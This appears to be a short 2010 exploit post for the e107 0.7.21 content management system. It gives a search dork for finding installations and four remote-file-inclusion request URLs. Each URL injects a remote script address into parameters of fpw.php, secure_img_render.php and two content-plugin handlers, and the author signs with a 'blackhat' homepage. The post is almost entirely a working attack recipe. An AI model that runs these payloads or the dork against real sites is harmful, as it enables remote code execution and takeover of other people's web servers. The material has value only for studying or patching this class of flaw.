# Name: e107 0.7.21 full (RFI) Vulnerabilities
# Vendor: http://e107.org/
# Date: 2010-05-27
# Author : indoushka
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact : indoushka@hotmail.com
# Home : www.arab-blackhat.co.cc
# Bug : RFI
# Tested on : windows SP2 Français V.(Pnx2 2.0)
########################################################################
# Dork : This site is powered by e107, which is released under the terms of
the GNU GPL License.
# Exploit By indoushka
I - RFI:
1 - http://localhost/e107/fpw.php?THEMES_DIRECTORY=http://localhost/c.txt?
2 -
http://localhost/e107/e107_handlers/secure_img_render.php?ifile=http://loca
lhost/c.txt?
3 -
http://localhost/e107/e107_plugins/content/handlers/content_class.php?plugi
ndir=http://localhost/c.txt?
4 -
http://localhost/e107/e107_plugins/content/handlers/content_convert_class.p
hp?plugindir=http://localhost/c.txt?
暂无评论